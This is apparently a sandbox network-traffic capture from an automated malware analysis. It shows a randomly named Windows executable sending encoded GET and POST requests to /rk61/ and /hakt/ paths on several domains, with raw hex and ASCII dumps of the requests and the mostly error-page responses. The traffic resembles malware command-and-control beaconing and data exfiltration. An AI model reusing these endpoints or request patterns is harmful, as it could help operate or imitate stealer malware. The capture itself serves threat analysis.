                                                  server-timing: cfL4;desc="?proto=TCP&rtt=18636&min_rtt=18636&rtt_var=9318&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1761&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->...
                                                  Jan 10, 2025 20:11:25.845660925 CET132INData Raw: 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64
                                                  Data Ascii: a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                  Jan 10, 2025 20:11:25.845868111 CET5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.964522188.114.97.3806568C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 10, 2025 20:11:27.662421942 CET446OUTGET /rk61/?rdmhfXe=4Jev6jkxg6xEO7DVmJ20iETfs2t7f6dacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9IEZesAjm/l1NEB+do2leeTcUFeI7Uw==&AF=At8pGDY0Z HTTP/1.1
                                                  Host: www.supernutra01.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Jan 10, 2025 20:11:28.345433950 CET1236INHTTP/1.1 200 OK
                                                  Date: Fri, 10 Jan 2025 19:11:28 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT
                                                  Accept-Ranges: bytes
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wHR5dJwjBpwehrKt4hWAxs00QpCviou8EE7RQIB9GGrlxIDzCCJXRrYzTfcXXgcRj%2BqMFzVFVGXXMAWAUOBFWnYWnW5UXrvi4Oce5Q%2FV55mWDzcugspfiPHOlwbcPp4pMKdS6QudSN6zpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ffef9185dddef9f-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1975&rtt_var=987&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=446&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 [TRUNCATED]
                                                  Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,lab
                                                  Jan 10, 2025 20:11:28.345463037 CET1236INData Raw: 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 6d 61 69 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 2c 2e 77 69 6e 64 6f 77 2d
                                                  Data Ascii: el{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-he
                                                  Jan 10, 2025 20:11:28.345477104 CET1236INData Raw: 76 67 2d 6f 6e 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 34 30 70 78 3b 72 69 67 68 74 3a 2d 33 36 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 20 2e 73 76 67 2d 74 77 6f 7b
                                                  Data Ascii: vg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;line-heigh
                                                  Jan 10, 2025 20:11:28.345489025 CET1236INData Raw: 64 69 6e 67 2d 6c 65 66 74 3a 2e 36 38 37 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 38 37 35 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d
                                                  Data Ascii: ding-left:.6875rem}.window-main__item{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem
                                                  Jan 10, 2025 20:11:28.345503092 CET1236INData Raw: 65 6d 20 2c 2d 30 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35
                                                  Data Ascii: em ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:cal
                                                  Jan 10, 2025 20:11:28.345513105 CET1236INData Raw: 6d 20 2b 20 2e 31 38 37 35 2a 28 31 30 30 76 77 20 2d 20 32 30 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31
                                                  Data Ascii: m + .1875*(100vw - 20rem)/ 25.625)}}@supports (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:cl
                                                  Jan 10, 2025 20:11:28.345520973 CET776INData Raw: 20 2c 31 2e 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 6d 61 72 67 69 6e 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34
                                                  Data Ascii: ,1.875rem)}}@supports not (margin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window-main__body{margin-top:calc(1.5rem + .375*(100vw - 20rem)/ 25.625)}}}a{transition: all 0.4s; background-color: #0E0F
                                                  Jan 10, 2025 20:11:28.345525980 CET1236INData Raw: 39 39 20 34 31 38 2e 34 37 32 20 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 20 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 5a 22 20 66 69 6c 6c 3d 22 23 30 30 34 39 38 44 22 20 2f 3e 0a 09 09 09 09 09 09 3c 2f 67 3e 0a 09 09 09 09 09 09 3c 67
                                                  Data Ascii: 99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g><g opacity="0.7" filter="url(#filter1_f_2001_5)"><ellipse cx="50.6112" cy="60.3996" rx="50.6112" ry="60.3996" transform="matrix(-0.916366 0.400341 -0.15071
                                                  Jan 10, 2025 20:11:28.345534086 CET1236INData Raw: 22 30 22 20 72 65 73 75 6c 74 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 42 6c 65 6e 64 20 6d 6f 64 65 3d 22 6e 6f 72 6d 61 6c 22 20 69 6e 3d 22 53 6f 75 72 63 65 47 72 61 70 68 69
                                                  Data Ascii: "0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBlur_2001_5" /></filter><filter
                                                  Jan 10, 2025 20:11:28.345540047 CET1236INData Raw: 6d 61 69 6e 20 68 61 73 20 61 6e 20 41 41 41 41 20 72 65 63 6f 72 64 2c 20 62 75 74 20 74 68 65 20 73 69 74 65 20 6f 6e 6c 79 20 77 6f 72 6b 73 20 77 69 74 68 20 49 50 76 34 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 3c 2f 6c 69 3e 0a 09 09 09
                                                  Data Ascii: main has an AAAA record, but the site only works with IPv4 on the server.</li></ul></div><div class="window-main__actions"><a href="https://kb.fastpanel.direct/troubleshoot/" class="window-main__link _link">View more
                                                  Jan 10, 2025 20:11:28.346322060 CET648INData Raw: 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72 65 73 75 6c 74 3d 22 73 68 61 70 65 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 37 35 22 20 72 65 73 75 6c 74 3d
                                                  Data Ascii: roundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBlur_2001_10" /></filter><filter id="filter1_f_2001_10" x="27.2657" y="0.225037" width="703.261" height="829.52" filterUnits="


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.964523194.245.148.189806568C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 10, 2025 20:11:33.404979944 CET721OUTPOST /hakt/ HTTP/1.1
                                                  Host: www.wine-drinkers.club
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 196
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.wine-drinkers.club
                                                  Referer: http://www.wine-drinkers.club/hakt/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 55 31 38 35 2b 65 78 39 49 6a 39 41 58 51 65 43 6a 4c 75 6c 52 78 51 54 4c 74 67 6d 35 64 52 52 46 6c 5a 2b 33 47 4e 68 69 2b 44 57 67 61 47 55 45 38 6f 66 42 6c 45 79 78 33 75 37 77 4e 67 32 6d 62 6e 38 6e 37 5a 34 78 4c 4c 36 50 49 6e 30 51 6a 48 65 44 2f 70 66 4c 34 79 30 54 2f 67 77 74 79 4c 69 36 7a 5a 69 63 43 6f 4b 45 7a 67 46 57 6c 4e 6f 75 68 36 4d 6b 69 66 79 66 74 57 75 34 32 47 57 6d 61 41 68 52 6a 7a 37 55 6a 38 66 2f 68 62 38 58 51 54 57 46 79 52 48 31 4a 58 58 44 2f 71 47 5a 5a 4d 54 54 37 4c 70 51 30 65 65 6f 74 79 69 42 42 57 79 77 65 69 73
                                                  Data Ascii: rdmhfXe=U185+ex9Ij9AXQeCjLulRxQTLtgm5dRRFlZ+3GNhi+DWgaGUE8ofBlEyx3u7wNg2mbn8n7Z4xLL6PIn0QjHeD/pfL4y0T/gwtyLi6zZicCoKEzgFWlNouh6MkifyftWu42GWmaAhRjz7Uj8f/hb8XQTWFyRH1JXXD/qGZZMTT7LpQ0eeotyiBBWyweis
                                                  Jan 10, 2025 20:11:34.312269926 CET165INHTTP/1.1 403 Forbidden
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:34 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Jan 10, 2025 20:11:34.312556982 CET560INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f
                                                  Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.964524194.245.148.189806568C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 10, 2025 20:11:35.947566032 CET745OUTPOST /hakt/ HTTP/1.1
                                                  Host: www.wine-drinkers.club
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 220
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.wine-drinkers.club
                                                  Referer: http://www.wine-drinkers.club/hakt/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 55 31 38 35 2b 65 78 39 49 6a 39 41 57 77 75 43 76 4d 43 6c 58 52 51 51 46 4e 67 6d 69 4e 52 4e 46 6c 46 2b 33 48 5a 50 6a 4d 58 57 68 2f 36 55 46 39 6f 66 45 6c 45 79 37 58 75 36 36 74 67 35 6d 61 62 65 6e 36 6c 34 78 4c 50 36 50 4d 6a 30 51 51 2b 73 43 76 70 5a 44 59 79 32 51 50 67 77 74 79 4c 69 36 31 31 62 63 43 67 4b 46 44 77 46 55 41 68 72 74 68 36 4c 6a 69 66 79 56 39 57 71 34 32 48 37 6d 65 59 4c 52 67 4c 37 55 68 30 66 78 55 6e 7a 65 51 54 51 4c 53 51 34 39 5a 4f 53 61 64 65 75 64 62 73 73 4c 64 4c 37 65 31 69 41 35 66 37 35 55 57 57 56 33 35 72 45 59 65 41 34 61 4f 76 63 6c 75 73 74 6f 43 57 6d 6c 4d 55 4e 46 77 3d 3d
                                                  Data Ascii: rdmhfXe=U185+ex9Ij9AWwuCvMClXRQQFNgmiNRNFlF+3HZPjMXWh/6UF9ofElEy7Xu66tg5maben6l4xLP6PMj0QQ+sCvpZDYy2QPgwtyLi611bcCgKFDwFUAhrth6LjifyV9Wq42H7meYLRgL7Uh0fxUnzeQTQLSQ49ZOSadeudbssLdL7e1iA5f75UWWV35rEYeA4aOvclustoCWmlMUNFw==
                                                  Jan 10, 2025 20:11:37.284096003 CET165INHTTP/1.1 403 Forbidden
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:37 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Jan 10, 2025 20:11:37.285154104 CET560INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f
                                                  Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.964525194.245.148.189806568C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 10, 2025 20:11:38.492543936 CET1758OUTPOST /hakt/ HTTP/1.1
                                                  Host: www.wine-drinkers.club
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 1232
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.wine-drinkers.club
                                                  Referer: http://www.wine-drinkers.club/hakt/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 55 31 38 35 2b 65 78 39 49 6a 39 41 57 77 75 43 76 4d 43 6c 58 52 51 51 46 4e 67 6d 69 4e 52 4e 46 6c 46 2b 33 48 5a 50 6a 4e 76 57 67 4e 43 55 44 65 41 66 48 6c 45 79 33 33 75 33 36 74 67 6b 6d 62 7a 61 6e 36 6f 44 78 4a 6e 36 4e 76 72 30 48 52 2b 73 4d 66 70 5a 50 34 79 37 54 2f 68 30 74 79 62 6d 36 7a 56 62 63 43 67 4b 46 46 30 46 51 56 4e 72 68 42 36 4d 6b 69 66 2b 66 74 57 53 34 77 75 4f 6d 65 55 78 51 52 72 37 55 43 63 66 7a 6d 50 7a 52 51 54 53 62 43 51 67 39 5a 79 5a 61 64 53 31 64 66 73 47 4c 61 2f 37 64 6a 37 33 72 65 47 67 58 51 4f 31 39 62 76 61 41 62 64 63 59 4d 66 5a 79 2f 73 44 78 6e 7a 45 6d 76 52 6f 64 34 69 72 4c 6c 4b 72 6d 76 4b 65 38 35 63 50 49 76 47 47 4f 4b 62 73 2f 35 61 39 6d 6b 48 4a 42 50 41 78 46 48 6b 66 4d 33 50 7a 77 44 2b 77 7a 45 58 44 55 34 32 67 35 51 36 69 6d 6e 38 6f 62 37 56 47 6b 78 59 72 5a 57 51 45 61 32 52 73 4c 63 77 37 64 48 79 38 4e 6b 4d 6d 4f 4a 70 2b 77 59 5a 53 7a 59 6e 7a 35 4d 35 43 52 39 4b 65 45 57 34 4a 6d 76 70 54 46 53 [TRUNCATED]
                                                  Data Ascii: rdmhfXe=U185+ex9Ij9AWwuCvMClXRQQFNgmiNRNFlF+3HZPjNvWgNCUDeAfHlEy33u36tgkmbzan6oDxJn6Nvr0HR+sMfpZP4y7T/h0tybm6zVbcCgKFF0FQVNrhB6Mkif+ftWS4wuOmeUxQRr7UCcfzmPzRQTSbCQg9ZyZadS1dfsGLa/7dj73reGgXQO19bvaAbdcYMfZy/sDxnzEmvRod4irLlKrmvKe85cPIvGGOKbs/5a9mkHJBPAxFHkfM3PzwD+wzEXDU42g5Q6imn8ob7VGkxYrZWQEa2RsLcw7dHy8NkMmOJp+wYZSzYnz5M5CR9KeEW4JmvpTFSMLZ0OSDY6eVMnB835F54gD6GQ1VN2NaQhp+shwIdRy27lagop/qQfeTf1jV3SBOP2lfzEgqS02W7e7AVpe7QCs+Jt1H0HyDmwCh3Wr3JzB0uOs7GVmFHIc8HHdpwVknmPXD6wOVMEhAzYE+xRDqhXZjdcd5iZi781ye/mxvxW7iccCpttdX9s1q9m+f3kRvImblIFy1H5l2svJpdROgy4bGWZbQw4mCf5QC/704NIX4Z2rJeVwUc9VkBoJ4VaIkqJgfShh2N06sHUIxsNCOKfJKNpmlKUjGdB4rKXftjYhIA8LrvC15uJAMbd+ijFrYGcWwKWzDMiVU0K7kKtG35EFlCRinHyn5jqziYN80FzX0YW3KwlmytHUoGXkhR91xMAnv5x5Ctro93J+ZHqx7i02ZFvk4krdqgZhkbT35LS/TXpMAdLNRmEsQGDVkBPemB7vCdxX09R5newnOp+ry6EVoQ16cc1ZeRqWUYrLUptKCu2XY+8H8Ww/RYfhJ53KEJLIF1cxnQXM1XGJN4V5Cvodm0S40M79zf/ppl4BxdCorYta7XYFsu+x7LQpqGbiQteHar4RobC980N8lgWg+wDzDrzdRCrBPmzt3U2Mxboxg8wLDcg8h4aQ18RUQXuFwgIabQG7rItWRhTVtUXdCxSZuUXjVl3valaN [TRUNCATED]
                                                  Jan 10, 2025 20:11:39.489900112 CET725INHTTP/1.1 403 Forbidden
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:39 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                  Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.964526194.245.148.189806568C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 10, 2025 20:11:41.032916069 CET445OUTGET /hakt/?rdmhfXe=Z3UZ9pkvUTN8eySircCOaDAcK9AA6JZfB0YdpGFssPaitvOOGMcOB1EIrUeEo9sxw4W4nK9e2r79OuzvY2TkP9tUb4eHWat+jQL942ZrdRgvNUE9NQ==&AF=At8pGDY0Z HTTP/1.1
                                                  Host: www.wine-drinkers.club
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Jan 10, 2025 20:11:41.789422035 CET1236INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:41 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 1840
                                                  Last-Modified: Tue, 04 Apr 2017 13:56:46 GMT
                                                  Connection: close
                                                  ETag: "58e3a61e-730"
                                                  Accept-Ranges: bytes
